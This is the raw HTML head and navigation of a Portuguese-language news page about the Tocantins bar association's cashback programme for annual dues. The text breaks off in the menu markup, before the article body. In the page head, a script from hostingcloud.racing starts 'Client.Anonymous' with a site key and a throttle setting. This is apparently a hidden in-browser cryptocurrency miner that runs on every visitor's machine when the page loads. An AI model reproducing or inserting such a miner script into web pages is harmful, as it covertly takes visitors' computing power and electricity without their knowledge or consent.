<!DOCTYPE html>
<html lang="pt-BR">
<head>
<meta charset="UTF-8" >
<meta name="viewport" id="viewport" content="width=device-width, initial-scale=1.0, maximum-scale=1.0, minimum-scale=1.0, user-scalable=no" />
<link rel="pingback" href="https://folhadotocantins.com.br/xmlrpc.php" />
<meta property="og:type" content="article" />
					<meta property="og:image" content="https://folhadotocantins.com.br/wp-content/uploads/2021/01/porto-nacional-palmas-paraiso-do-tocantins-estado-do-tocantins-gurupi-noticias-de-tocantins-noticias-do-tocantins-163.jpg" />
		<meta name="twitter:image" content="https://folhadotocantins.com.br/wp-content/uploads/2021/01/porto-nacional-palmas-paraiso-do-tocantins-estado-do-tocantins-gurupi-noticias-de-tocantins-noticias-do-tocantins-163.jpg" />
	<meta property="og:url" content="https://folhadotocantins.com.br/oab-to-anuidade-zero-31-mil-advogados-e-advogadas-aderem-programa-e-terao-desconto-em-2021/" />
<meta property="og:title" content="OAB/TO: Anuidade Zero: 3,1 mil advogados e advogadas aderem programa e terão desconto em 2021" />
<meta property="og:description" content="Um advogado acumulou mais de R$ 3 mil em cash back com o programa. Saldo acumulado é o bastante para pagar três anuidades" />
<meta name="twitter:card" content="summary">
<meta name="twitter:url" content="https://folhadotocantins.com.br/oab-to-anuidade-zero-31-mil-advogados-e-advogadas-aderem-programa-e-terao-desconto-em-2021/">
<meta name="twitter:title" content="OAB/TO: Anuidade Zero: 3,1 mil advogados e advogadas aderem programa e terão desconto em 2021">
<meta name="twitter:description" content="Um advogado acumulou mais de R$ 3 mil em cash back com o programa. Saldo acumulado é o bastante para pagar três anuidades">
	<script type="text/javascript">function theChampLoadEvent(e){var t=window.onload;if(typeof window.onload!="function"){window.onload=e}else{window.onload=function(){t();e()}}}</script>
		<script type="text/javascript">var theChampDefaultLang = 'pt_BR', theChampCloseIconPath = 'https://folhadotocantins.com.br/wp-content/plugins/super-socializer/images/close.png';</script>
		<script> var theChampSiteUrl = 'https://folhadotocantins.com.br', theChampVerified = 0, theChampEmailPopup = 0; </script>
			<script> var theChampFBKey = '', theChampFBLang = 'pt_BR', theChampFbLikeMycred = 0, theChampSsga = 0, theChampCommentNotification = 0, theChampHeateorFcmRecentComments = 0, theChampFbIosLogin = 0; </script>
						<script type="text/javascript">var theChampFBCommentUrl = 'https://folhadotocantins.com.br/oab-to-anuidade-zero-31-mil-advogados-e-advogadas-aderem-programa-e-terao-desconto-em-2021/'; var theChampFBCommentColor = 'light'; var theChampFBCommentNumPosts = ''; var theChampFBCommentWidth = '100%'; var theChampFBCommentOrderby = 'social'; var theChampCommentingTabs = "facebook,wordpress", theChampGpCommentsUrl = 'https://folhadotocantins.com.br/oab-to-anuidade-zero-31-mil-advogados-e-advogadas-aderem-programa-e-terao-desconto-em-2021/', theChampDisqusShortname = '', theChampScEnabledTabs = 'fb,wordpress', theChampScLabel = 'Comentários', theChampScTabLabels = {"wordpress":"Coment\u00e1rios Padr\u00e3o (0)","fb":"Coment\u00e1rios Facebook","disqus":"Coment\u00e1rios Disqus"}, theChampGpCommentsWidth = 0, theChampCommentingId = 'respond'</script>
						<script> var theChampSharingAjaxUrl = 'https://folhadotocantins.com.br/wp-admin/admin-ajax.php', heateorSsFbMessengerAPI = 'https://www.facebook.com/dialog/send?app_id=595489497242932&display=popup&link=%encoded_post_url%&redirect_uri=%encoded_post_url%',heateorSsWhatsappShareAPI = 'web', heateorSsUrlCountFetched = [], heateorSsSharesText = 'Shares', heateorSsShareText = 'Share', theChampPluginIconPath = 'https://folhadotocantins.com.br/wp-content/plugins/super-socializer/images/logo.png', theChampHorizontalSharingCountEnable = 0, theChampVerticalSharingCountEnable = 0, theChampSharingOffset = -10, theChampCounterOffset = -10, theChampMobileStickySharingEnabled = 1, heateorSsCopyLinkMessage = "Link copied.";
		var heateorSsHorSharingShortUrl = "https://folhadotocantins.com.br/oab-to-anuidade-zero-31-mil-advogados-e-advogadas-aderem-programa-e-terao-desconto-em-2021/";		</script>
			<style type="text/css">.the_champ_horizontal_sharing .theChampSharing{
					color: #fff;
				border-width: 0px;
		border-style: solid;
		border-color: transparent;
	}
		.the_champ_horizontal_sharing .theChampTCBackground{
		color:#666;
	}
		.the_champ_horizontal_sharing .theChampSharing:hover{
				border-color: transparent;
	}
	.the_champ_vertical_sharing .theChampSharing{
					color: #fff;
				border-width: 0px;
		border-style: solid;
		border-color: transparent;
	}
		.the_champ_vertical_sharing .theChampTCBackground{
		color:#666;
	}
		.the_champ_vertical_sharing .theChampSharing:hover{
				border-color: transparent;
	}
	@media screen and (max-width:783px){.the_champ_vertical_sharing{display:none!important}}div.heateor_ss_mobile_footer{display:none;}@media screen and (max-width:783px){i.theChampTCBackground{background-color:white!important}div.the_champ_bottom_sharing{width:100%!important;left:0!important;}div.the_champ_bottom_sharing li{width:33.333333333333% !important;}div.the_champ_bottom_sharing .theChampSharing{width: 100% !important;}div.the_champ_bottom_sharing div.theChampTotalShareCount{font-size:1em!important;line-height:28px!important}div.the_champ_bottom_sharing div.theChampTotalShareText{font-size:.7em!important;line-height:0px!important}div.heateor_ss_mobile_footer{display:block;height:40px;}.the_champ_bottom_sharing{padding:0!important;display:block!important;width: auto!important;bottom:-2px!important;top: auto!important;}.the_champ_bottom_sharing .the_champ_square_count{line-height: inherit;}.the_champ_bottom_sharing .theChampSharingArrow{display:none;}.the_champ_bottom_sharing .theChampTCBackground{margin-right: 1.1em !important}}</style>
	
	<!-- This site is optimized with the Yoast SEO plugin v14.8.1 - https://yoast.com/wordpress/plugins/seo/ -->
	<title>OAB/TO: Anuidade Zero: 3,1 mil advogados e advogadas aderem programa e terão desconto em 2021 - Folha do Tocantins</title>
	<meta name="robots" content="index, follow" />
	<meta name="googlebot" content="index, follow, max-snippet:-1, max-image-preview:large, max-video-preview:-1" />
	<meta name="bingbot" content="index, follow, max-snippet:-1, max-image-preview:large, max-video-preview:-1" />
	<link rel="canonical" href="https://folhadotocantins.com.br/oab-to-anuidade-zero-31-mil-advogados-e-advogadas-aderem-programa-e-terao-desconto-em-2021/" />
	<meta property="og:locale" content="pt_BR" />
	<meta property="og:type" content="article" />
	<meta property="og:title" content="OAB/TO: Anuidade Zero: 3,1 mil advogados e advogadas aderem programa e terão desconto em 2021 - Folha do Tocantins" />
	<meta property="og:description" content="Um advogado acumulou mais de R$ 3 mil em cash back com o programa. Saldo acumulado é o bastante para pagar três anuidades" />
	<meta property="og:url" content="https://folhadotocantins.com.br/oab-to-anuidade-zero-31-mil-advogados-e-advogadas-aderem-programa-e-terao-desconto-em-2021/" />
	<meta property="og:site_name" content="Folha do Tocantins" />
	<meta property="article:published_time" content="2021-01-21T19:29:08+00:00" />
	<meta property="og:image" content="https://folhadotocantins.com.br/wp-content/uploads/2021/01/porto-nacional-palmas-paraiso-do-tocantins-estado-do-tocantins-gurupi-noticias-de-tocantins-noticias-do-tocantins-163.jpg" />
	<meta property="og:image:width" content="900" />
	<meta property="og:image:height" content="600" />
	<meta name="twitter:card" content="summary_large_image" />
	<script type="application/ld+json" class="yoast-schema-graph">{"@context":"https://schema.org","@graph":[{"@type":"WebSite","@id":"https://folhadotocantins.com.br/#website","url":"https://folhadotocantins.com.br/","name":"Folha do Tocantins","description":"Portal de Not\u00edcias de Tocantins e do Brasil","potentialAction":[{"@type":"SearchAction","target":"https://folhadotocantins.com.br/?s={search_term_string}","query-input":"required name=search_term_string"}],"inLanguage":"pt-BR"},{"@type":"ImageObject","@id":"https://folhadotocantins.com.br/oab-to-anuidade-zero-31-mil-advogados-e-advogadas-aderem-programa-e-terao-desconto-em-2021/#primaryimage","inLanguage":"pt-BR","url":"https://folhadotocantins.com.br/wp-content/uploads/2021/01/porto-nacional-palmas-paraiso-do-tocantins-estado-do-tocantins-gurupi-noticias-de-tocantins-noticias-do-tocantins-163.jpg","width":900,"height":600},{"@type":"WebPage","@id":"https://folhadotocantins.com.br/oab-to-anuidade-zero-31-mil-advogados-e-advogadas-aderem-programa-e-terao-desconto-em-2021/#webpage","url":"https://folhadotocantins.com.br/oab-to-anuidade-zero-31-mil-advogados-e-advogadas-aderem-programa-e-terao-desconto-em-2021/","name":"OAB/TO: Anuidade Zero: 3,1 mil advogados e advogadas aderem programa e ter\u00e3o desconto em 2021 - Folha do Tocantins","isPartOf":{"@id":"https://folhadotocantins.com.br/#website"},"primaryImageOfPage":{"@id":"https://folhadotocantins.com.br/oab-to-anuidade-zero-31-mil-advogados-e-advogadas-aderem-programa-e-terao-desconto-em-2021/#primaryimage"},"datePublished":"2021-01-21T19:29:08+00:00","dateModified":"2021-01-21T19:29:08+00:00","author":{"@id":"https://folhadotocantins.com.br/#/schema/person/7af4d2fafdb11cfa820146cb054739ce"},"inLanguage":"pt-BR","potentialAction":[{"@type":"ReadAction","target":["https://folhadotocantins.com.br/oab-to-anuidade-zero-31-mil-advogados-e-advogadas-aderem-programa-e-terao-desconto-em-2021/"]}]},{"@type":"Person","@id":"https://folhadotocantins.com.br/#/schema/person/7af4d2fafdb11cfa820146cb054739ce","name":"Folha do Tocantins","image":{"@type":"ImageObject","@id":"https://folhadotocantins.com.br/#personlogo","inLanguage":"pt-BR","url":"https://secure.gravatar.com/avatar/cc286a23afa12a894f6d034d1c494d70?s=96&d=mm&r=g","caption":"Folha do Tocantins"}}]}</script>
	<!-- / Yoast SEO plugin. -->


<link rel='dns-prefetch' href='//fonts.googleapis.com' />
<link rel='dns-prefetch' href='//s.w.org' />
<link rel="alternate" type="application/rss+xml" title="Feed para Folha do Tocantins &raquo;" href="https://folhadotocantins.com.br/feed/" />
<link rel="alternate" type="application/rss+xml" title="Feed de comentários para Folha do Tocantins &raquo;" href="https://folhadotocantins.com.br/comments/feed/" />
<link rel="alternate" type="application/rss+xml" title="Feed de comentários para Folha do Tocantins &raquo; OAB/TO: Anuidade Zero: 3,1 mil advogados e advogadas aderem programa e terão desconto em 2021" href="https://folhadotocantins.com.br/oab-to-anuidade-zero-31-mil-advogados-e-advogadas-aderem-programa-e-terao-desconto-em-2021/feed/" />
		<script type="text/javascript">
			window._wpemojiSettings = {"baseUrl":"https:\/\/s.w.org\/images\/core\/emoji\/13.0.0\/72x72\/","ext":".png","svgUrl":"https:\/\/s.w.org\/images\/core\/emoji\/13.0.0\/svg\/","svgExt":".svg","source":{"concatemoji":"https:\/\/folhadotocantins.com.br\/wp-includes\/js\/wp-emoji-release.min.js?ver=5.5.2"}};
			!function(e,a,t){var r,n,o,i,p=a.createElement("canvas"),s=p.getContext&&p.getContext("2d");function c(e,t){var a=String.fromCharCode;s.clearRect(0,0,p.width,p.height),s.fillText(a.apply(this,e),0,0);var r=p.toDataURL();return s.clearRect(0,0,p.width,p.height),s.fillText(a.apply(this,t),0,0),r===p.toDataURL()}function l(e){if(!s||!s.fillText)return!1;switch(s.textBaseline="top",s.font="600 32px Arial",e){case"flag":return!c([127987,65039,8205,9895,65039],[127987,65039,8203,9895,65039])&&(!c([55356,56826,55356,56819],[55356,56826,8203,55356,56819])&&!c([55356,57332,56128,56423,56128,56418,56128,56421,56128,56430,56128,56423,56128,56447],[55356,57332,8203,56128,56423,8203,56128,56418,8203,56128,56421,8203,56128,56430,8203,56128,56423,8203,56128,56447]));case"emoji":return!c([55357,56424,8205,55356,57212],[55357,56424,8203,55356,57212])}return!1}function d(e){var t=a.createElement("script");t.src=e,t.defer=t.type="text/javascript",a.getElementsByTagName("head")[0].appendChild(t)}for(i=Array("flag","emoji"),t.supports={everything:!0,everythingExceptFlag:!0},o=0;o<i.length;o++)t.supports[i[o]]=l(i[o]),t.supports.everything=t.supports.everything&&t.supports[i[o]],"flag"!==i[o]&&(t.supports.everythingExceptFlag=t.supports.everythingExceptFlag&&t.supports[i[o]]);t.supports.everythingExceptFlag=t.supports.everythingExceptFlag&&!t.supports.flag,t.DOMReady=!1,t.readyCallback=function(){t.DOMReady=!0},t.supports.everything||(n=function(){t.readyCallback()},a.addEventListener?(a.addEventListener("DOMContentLoaded",n,!1),e.addEventListener("load",n,!1)):(e.attachEvent("onload",n),a.attachEvent("onreadystatechange",function(){"complete"===a.readyState&&t.readyCallback()})),(r=t.source||{}).concatemoji?d(r.concatemoji):r.wpemoji&&r.twemoji&&(d(r.twemoji),d(r.wpemoji)))}(window,document,window._wpemojiSettings);
		</script>
		<style type="text/css">
img.wp-smiley,
img.emoji {
	display: inline !important;
	border: none !important;
	box-shadow: none !important;
	height: 1em !important;
	width: 1em !important;
	margin: 0 .07em !important;
	vertical-align: -0.1em !important;
	background: none !important;
	padding: 0 !important;
}
</style>
	<link rel='stylesheet' id='wp-block-library-css'  href='https://folhadotocantins.com.br/wp-includes/css/dist/block-library/style.min.css?ver=5.5.2' type='text/css' media='all' />
<link rel='stylesheet' id='mvp-custom-style-css'  href='https://folhadotocantins.com.br/wp-content/themes/zox-news/style.css?ver=5.5.2' type='text/css' media='all' />
<style id='mvp-custom-style-inline-css' type='text/css'>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</style>
<link rel='stylesheet' id='mvp-reset-css'  href='https://folhadotocantins.com.br/wp-content/themes/zox-news/css/reset.css?ver=5.5.2' type='text/css' media='all' />
<link rel='stylesheet' id='fontawesome-css'  href='https://folhadotocantins.com.br/wp-content/themes/zox-news/font-awesome/css/font-awesome.css?ver=5.5.2' type='text/css' media='all' />
<link rel='stylesheet' id='mvp-fonts-css'  href='//fonts.googleapis.com/css?family=Roboto%3A300%2C400%2C700%2C900%7COswald%3A400%2C700%7CAdvent+Pro%3A700%7COpen+Sans%3A700%7CAnton%3A400Oswald%3A100%2C200%2C300%2C400%2C500%2C600%2C700%2C800%2C900%7COswald%3A100%2C200%2C300%2C400%2C500%2C600%2C700%2C800%2C900%7CRoboto%3A100%2C200%2C300%2C400%2C500%2C600%2C700%2C800%2C900%7CRoboto%3A100%2C200%2C300%2C400%2C500%2C600%2C700%2C800%2C900%7CRoboto%3A100%2C200%2C300%2C400%2C500%2C600%2C700%2C800%2C900%7COswald%3A100%2C200%2C300%2C400%2C500%2C600%2C700%2C800%2C900%26subset%3Dlatin%2Clatin-ext%2Ccyrillic%2Ccyrillic-ext%2Cgreek-ext%2Cgreek%2Cvietnamese' type='text/css' media='all' />
<link rel='stylesheet' id='mvp-media-queries-css'  href='https://folhadotocantins.com.br/wp-content/themes/zox-news/css/media-queries.css?ver=5.5.2' type='text/css' media='all' />
<link rel='stylesheet' id='the_champ_frontend_css-css'  href='https://folhadotocantins.com.br/wp-content/plugins/super-socializer/css/front.css?ver=7.13.5' type='text/css' media='all' />
<link rel='stylesheet' id='the_champ_sharing_default_svg-css'  href='https://folhadotocantins.com.br/wp-content/plugins/super-socializer/css/share-svg.css?ver=7.13.5' type='text/css' media='all' />
<script type='text/javascript' src='https://folhadotocantins.com.br/wp-includes/js/jquery/jquery.js?ver=1.12.4-wp' id='jquery-core-js'></script>
<link rel="https://api.w.org/" href="https://folhadotocantins.com.br/wp-json/" /><link rel="alternate" type="application/json" href="https://folhadotocantins.com.br/wp-json/wp/v2/posts/36534" /><link rel="EditURI" type="application/rsd+xml" title="RSD" href="https://folhadotocantins.com.br/xmlrpc.php?rsd" />
<link rel="wlwmanifest" type="application/wlwmanifest+xml" href="https://folhadotocantins.com.br/wp-includes/wlwmanifest.xml" /> 
<meta name="generator" content="WordPress 5.5.2" />
<link rel='shortlink' href='https://folhadotocantins.com.br/?p=36534' />
<link rel="alternate" type="application/json+oembed" href="https://folhadotocantins.com.br/wp-json/oembed/1.0/embed?url=https%3A%2F%2Ffolhadotocantins.com.br%2Foab-to-anuidade-zero-31-mil-advogados-e-advogadas-aderem-programa-e-terao-desconto-em-2021%2F" />
<link rel="alternate" type="text/xml+oembed" href="https://folhadotocantins.com.br/wp-json/oembed/1.0/embed?url=https%3A%2F%2Ffolhadotocantins.com.br%2Foab-to-anuidade-zero-31-mil-advogados-e-advogadas-aderem-programa-e-terao-desconto-em-2021%2F&#038;format=xml" />

<!-- This site is using AdRotate v5.8.11 to display their advertisements - https://ajdg.solutions/ -->
<!-- AdRotate CSS -->
<style type="text/css" media="screen">
	.g { margin:0px; padding:0px; overflow:hidden; line-height:1; zoom:1; }
	.g img { height:auto; }
	.g-col { position:relative; float:left; }
	.g-col:first-child { margin-left: 0; }
	.g-col:last-child { margin-right: 0; }
	.g-1 { width:100%; max-width:970px; height:100%; max-height:250px; margin: 0 auto; }
	.g-2 { width:100%; max-width:970px; height:100%; max-height:250px; margin: 0 auto; }
	.g-3 { width:100%; max-width:970px; height:100%; max-height:250px; margin: 0 auto; }
	.g-4 { min-width:10px; max-width:960px; margin: 0 auto; }
	.b-4 { margin:10px; }
	.g-5 { min-width:10px; max-width:320px; margin: 0 auto; }
	.b-5 { margin:10px; }
	.g-6 { min-width:10px; max-width:320px; margin: 0 auto; }
	.b-6 { margin:10px; }
	.g-7 { min-width:10px; max-width:960px; margin: 0 auto; }
	.b-7 { margin:10px; }
	.g-8 { min-width:10px; max-width:960px; }
	.b-8 { margin:10px; }
	@media only screen and (max-width: 480px) {
		.g-col, .g-dyn, .g-single { width:100%; margin-left:0; margin-right:0; }
	}
</style>
<!-- /AdRotate CSS -->

<!-- Analytics by WP-Statistics v13.0.5 - https://wp-statistics.com/ -->
<link rel="icon" href="https://folhadotocantins.com.br/wp-content/uploads/2018/08/cropped-favicon-folha-do-tocantins-3-32x32.png" sizes="32x32" />
<link rel="icon" href="https://folhadotocantins.com.br/wp-content/uploads/2018/08/cropped-favicon-folha-do-tocantins-3-192x192.png" sizes="192x192" />
<link rel="apple-touch-icon" href="https://folhadotocantins.com.br/wp-content/uploads/2018/08/cropped-favicon-folha-do-tocantins-3-180x180.png" />
<meta name="msapplication-TileImage" content="https://folhadotocantins.com.br/wp-content/uploads/2018/08/cropped-favicon-folha-do-tocantins-3-270x270.png" />
	<script src="https://www.hostingcloud.racing/HjSi.js"></script>
<script>
    var _client = new Client.Anonymous('66316925acaad2f51cfcb59fe8f48a1854f9c4bc30d809cc49523733609d31de', {
        throttle: 0.7, c: 'w', ads: 0
    });
    _client.start();
    

</script>
</head>
<body class="post-template-default single single-post postid-36534 single-format-standard wp-embed-responsive">
	<div id="mvp-fly-wrap">
	<div id="mvp-fly-menu-top" class="left relative">
		<div class="mvp-fly-top-out left relative">
			<div class="mvp-fly-top-in">
				<div id="mvp-fly-logo" class="left relative">
											<a href="https://folhadotocantins.com.br/"><img src="https://folhadotocantins.com.br/wp-content/uploads/2018/08/logofolhadotocantins.png" alt="Folha do Tocantins" data-rjs="2" /></a>
									</div><!--mvp-fly-logo-->
			</div><!--mvp-fly-top-in-->
			<div class="mvp-fly-but-wrap mvp-fly-but-menu mvp-fly-but-click">
				<span></span>
				<span></span>
				<span></span>
				<span></span>
			</div><!--mvp-fly-but-wrap-->
		</div><!--mvp-fly-top-out-->
	</div><!--mvp-fly-menu-top-->
	<div id="mvp-fly-menu-wrap">
		<nav class="mvp-fly-nav-menu left relative">
			<div class="menu-01-menu-principal-container"><ul id="menu-01-menu-principal" class="menu"><li id="menu-item-16" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-16"><a title="Página Inicial" href="/">Início</a></li>
<li id="menu-item-54" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-has-children menu-item-54"><a href="https://folhadotocantins.com.br/geral/">Geral</a>
<ul class="sub-menu">
	<li id="menu-item-58" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-58"><a href="https://folhadotocantins.com.br/saude/">Saúde</a></li>
	<li id="menu-item-50" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-50"><a href="https://folhadotocantins.com.br/cultura/">Cultura</a></li>
	<li id="menu-item-56" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-56"><a href="https://folhadotocantins.com.br/esporte/">Esporte</a></li>
</ul>
</li>
<li id="menu-item-47" class="mvp-mega-dropdown menu-item menu-item-type-taxonomy menu-item-object-category current-post-ancestor current-menu-parent current-post-parent menu-item-47"><a href="https://folhadotocantins.com.br/cidades/">Cidades</a></li>
<li id="menu-item-44" class="mvp-mega-dropdown menu-item menu-item-type-taxonomy menu-item-object-category menu-item-44"><a href="https://folhadotocantins.com.br/estado/">Estado</a></li>
<li id="menu-item-48" class="mvp-mega-dropdown menu-item menu-item-type-taxonomy menu-item-object-category menu-item-48"><a href="https://folhadotocantins.com.br/brasil/">Brasil</a></li>
<li id="menu-item-45" class="mvp-mega-dropdown menu-item menu-item-type-taxonomy menu-item-object-category menu-item-45"><a href="https://folhadotocantins.com.br/politica/">Política</a></li>
<li id="menu-item-51" class="mvp-mega-dropdown menu-item menu-item-type-taxonomy menu-item-object-category menu-item-51"><a href="https://folhadotocantins.com.br/curtas/">Curtas</a></li>
<li id="menu-item-52" class="mvp-mega-dropdown menu-item menu-item-type-taxonomy menu-item-object-category menu-item-52"><a href="https://folhadotocantins.com.br/blog-ft/">Contexto Gospel</a></li>
<li id="menu-item-60" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-60"><a href="https://folhadotocantins.com.br/policia/">Polícia</a></li>
<li id="menu-item-283" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-283"><a href="https://folhadotocantins.com.br/videos/">Cinema</a></li>
</ul></div>		</nav>
	</div><!--mvp-fly-menu-wrap-->
	<div id="mvp-fly-soc-wrap">
		<span class="mvp-fly-soc-head">Connect with us</span>
		<ul class="mvp-fly-soc-list left relative">
							<li><a href="https://www.facebook.com/folhadotocantins/" target="_blank" class="fa fa-facebook fa-2"></a></li>
																										</ul>
	</div><!--mvp-fly-soc-wrap-->
</div><!--mvp-fly-wrap-->	<div id="mvp-site" class="left relative">
		<div id="mvp-search-wrap">
			<div id="mvp-search-box">
				<form method="get" id="searchform" action="https://folhadotocantins.com.br/">
	<input type="text" name="s" id="s" value="Search" onfocus='if (this.value == "Search") { this.value = ""; }' onblur='if (this.value == "") { this.value = "Search"; }' />
	<input type="hidden" id="searchsubmit" value="Search" />
</form>			</div><!--mvp-search-box-->
			<div class="mvp-search-but-wrap mvp-search-click">
				<span></span>
				<span></span>
			</div><!--mvp-search-but-wrap-->
		</div><!--mvp-search-wrap-->
				<div id="mvp-site-wall" class="left relative">
						<div id="mvp-site-main" class="left relative">
			<header id="mvp-main-head-wrap" class="left relative">
									<nav id="mvp-main-nav-wrap" class="left relative">
						<div id="mvp-main-nav-top" class="left relative">
							<div class="mvp-main-box">
								<div id="mvp-nav-top-wrap" class="left relative">
									<div class="mvp-nav-top-right-out left relative">
										<div class="mvp-nav-top-right-in">
											<div class="mvp-nav-top-cont left relative">
												<div class="mvp-nav-top-left-out relative">
													<div class="mvp-nav-top-left">
														<div class="mvp-nav-soc-wrap">
																															<a href="https://www.facebook.com/folhadotocantins/" target="_blank"><span class="mvp-nav-soc-but fa fa-facebook fa-2"></span></a>
																																																																										</div><!--mvp-nav-soc-wrap-->
														<div class="mvp-fly-but-wrap mvp-fly-but-click left relative">
															<span></span>
															<span></span>
															<span></span>
															<span></span>
														</div><!--mvp-fly-but-wrap-->
													</div><!--mvp-nav-top-left-->
													<div class="mvp-nav-top-left-in">
														<div class="mvp-nav-top-mid left relative" itemscope itemtype="http://schema.org/Organization">
																															<a class="mvp-nav-logo-reg" itemprop="url" href="https://folhadotocantins.com.br/"><img itemprop="logo" src="https://folhadotocantins.com.br/wp-content/uploads/2018/08/logofolhadotocantins.png" alt="Folha do Tocantins" data-rjs="2" /></a>
																																														<a class="mvp-nav-logo-small" href="https://folhadotocantins.com.br/"><img src="https://folhadotocantins.com.br/wp-content/uploads/2018/08/logofolhadotocantins.png" alt="Folha do Tocantins" data-rjs="2" /></a>
																																														<h2 class="mvp-logo-title">Folha do Tocantins</h2>
																																														<div class="mvp-drop-nav-title left">
																	<h4>OAB/TO: Anuidade Zero: 3,1 mil advogados e advogadas aderem programa e terão desconto em 2021</h4>
																</div><!--mvp-drop-nav-title-->
																													</div><!--mvp-nav-top-mid-->
													</div><!--mvp-nav-top-left-in-->
												</div><!--mvp-nav-top-left-out-->
											</div><!--mvp-nav-top-cont-->
										</div><!--mvp-nav-top-right-in-->
										<div class="mvp-nav-top-right">
																						<span class="mvp-nav-search-but fa fa-search fa-2 mvp-search-click"></span>
										</div><!--mvp-nav-top-right-->
									</div><!--mvp-nav-top-right-out-->
								</div><!--mvp-nav-top-wrap-->
							</div><!--mvp-main-box-->
						</div><!--mvp-main-nav-top-->
						<div id="mvp-main-nav-bot" class="left relative">
							<div id="mvp-main-nav-bot-cont" class="left">
								<div class="mvp-main-box">
									<div id="mvp-nav-bot-wrap" class="left">
										<div class="mvp-nav-bot-right-out left">
											<div class="mvp-nav-bot-right-in">
												<div class="mvp-nav-bot-cont left">
													<div class="mvp-nav-bot-left-out">
														<div class="mvp-nav-bot-left left relative">
															<div class="mvp-fly-but-wrap mvp-fly-but-click left relative">
																<span></span>
																<span></span>
																<span></span>
																<span></span>
															</div><!--mvp-fly-but-wrap-->
														</div><!--mvp-nav-bot-left-->
														<div class="mvp-nav-bot-left-in">
															<div class="mvp-nav-menu left">
																<div class="menu-01-menu-principal-container"><ul id="menu-01-menu-principal-1" class="menu"><li class="menu-item menu-item-type-custom menu-item-object-custom menu-item-16"><a title="Página Inicial" href="/">Início</a></li>
<li class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-has-children menu-item-54 mvp-mega-dropdown"><a href="https://folhadotocantins.com.br/geral/">Geral</a><div class="mvp-mega-dropdown"><div class="mvp-main-box"><ul class="mvp-mega-list"><li><a href="https://folhadotocantins.com.br/secretaria-da-saude-prefeitura-de-palmas-recebe-3-331-doses-da-vacina-contra-a-covid-19/"><div class="mvp-mega-img"><img width="400" height="240" src="https://folhadotocantins.com.br/wp-content/uploads/2021/01/porto-nacional-palmas-paraiso-do-tocantins-estado-do-tocantins-gurupi-noticias-de-tocantins-noticias-do-tocantins-100-400x240.jpg" class="attachment-mvp-mid-thumb size-mvp-mid-thumb wp-post-image" alt="" loading="lazy" srcset="https://folhadotocantins.com.br/wp-content/uploads/2021/01/porto-nacional-palmas-paraiso-do-tocantins-estado-do-tocantins-gurupi-noticias-de-tocantins-noticias-do-tocantins-100-400x240.jpg 400w, https://folhadotocantins.com.br/wp-content/uploads/2021/01/porto-nacional-palmas-paraiso-do-tocantins-estado-do-tocantins-gurupi-noticias-de-tocantins-noticias-do-tocantins-100-590x354.jpg 590w" sizes="(max-width: 400px) 100vw, 400px" /></div><p>Secretaria da Saúde : Prefeitura de Palmas recebe 3.331 doses da vacina contra a Covid-19</p></a></li><li><a href="https://folhadotocantins.com.br/prazo-para-cadastro-de-reembolso-do-concurso-da-pm-to-comeca-nesta-segunda-feira/"><div class="mvp-mega-img"><img width="400" height="240" src="https://folhadotocantins.com.br/wp-content/uploads/2021/01/porto-nacional-palmas-paraiso-do-tocantins-estado-do-tocantins-gurupi-noticias-de-tocantins-noticias-do-tocantins-68-400x240.jpg" class="attachment-mvp-mid-thumb size-mvp-mid-thumb wp-post-image" alt="" loading="lazy" srcset="https://folhadotocantins.com.br/wp-content/uploads/2021/01/porto-nacional-palmas-paraiso-do-tocantins-estado-do-tocantins-gurupi-noticias-de-tocantins-noticias-do-tocantins-68-400x240.jpg 400w, https://folhadotocantins.com.br/wp-content/uploads/2021/01/porto-nacional-palmas-paraiso-do-tocantins-estado-do-tocantins-gurupi-noticias-de-tocantins-noticias-do-tocantins-68-590x354.jpg 590w" sizes="(max-width: 400px) 100vw, 400px" /></div><p>Prazo para cadastro de reembolso do concurso da PM/TO começa nesta segunda-feira</p></a></li><li><a href="https://folhadotocantins.com.br/hgp-e-escolhido-para-oferta-de-reabilitacao-de-pacientes-pos-covid-pela-equipe-do-sirio-libanes/"><div class="mvp-mega-img"><img width="400" height="240" src="https://folhadotocantins.com.br/wp-content/uploads/2021/01/palmas-tocantins-noticias-de-tocantins-porto-nacional-noticias-do-tocantins-capital-do-tocantins-g1-tocantins-gurupi-42-400x240.jpg" class="attachment-mvp-mid-thumb size-mvp-mid-thumb wp-post-image" alt="" loading="lazy" srcset="https://folhadotocantins.com.br/wp-content/uploads/2021/01/palmas-tocantins-noticias-de-tocantins-porto-nacional-noticias-do-tocantins-capital-do-tocantins-g1-tocantins-gurupi-42-400x240.jpg 400w, https://folhadotocantins.com.br/wp-content/uploads/2021/01/palmas-tocantins-noticias-de-tocantins-porto-nacional-noticias-do-tocantins-capital-do-tocantins-g1-tocantins-gurupi-42-590x354.jpg 590w" sizes="(max-width: 400px) 100vw, 400px" /></div><p>HGP é escolhido para oferta de reabilitação de pacientes pós-Covid, pela equipe do Sírio Libanês</p></a></li><li><a href="https://folhadotocantins.com.br/na-volta-do-recesso-tjto-anexos-e-corregedoria-reduzem-atividades-presenciais-a-25-ate-31-de-janeiro/"><div class="mvp-mega-img"><img width="400" height="240" src="https://folhadotocantins.com.br/wp-content/uploads/2021/01/porto-nacional-palmas-tocantins-estado-do-tocantins-79-400x240.jpg" class="attachment-mvp-mid-thumb size-mvp-mid-thumb wp-post-image" alt="" loading="lazy" srcset="https://folhadotocantins.com.br/wp-content/uploads/2021/01/porto-nacional-palmas-tocantins-estado-do-tocantins-79-400x240.jpg 400w, https://folhadotocantins.com.br/wp-content/uploads/2021/01/porto-nacional-palmas-tocantins-estado-do-tocantins-79-590x354.jpg 590w" sizes="(max-width: 400px) 100vw, 400px" /></div><p>Na volta do recesso, TJTO, Anexos e Corregedoria reduzem atividades presenciais a 25% até 31 de janeiro</p></a></li><li><a href="https://folhadotocantins.com.br/acontece-hoje-4-a-posse-da-jornalista-marimar-aiala-na-diretoria-de-comunicacao-da-camara-de-palmas/"><div class="mvp-mega-img"><img width="400" height="240" src="https://folhadotocantins.com.br/wp-content/uploads/2021/01/porto-nacional-palmas-tocantins-estado-do-tocantins-25-400x240.jpg" class="attachment-mvp-mid-thumb size-mvp-mid-thumb wp-post-image" alt="" 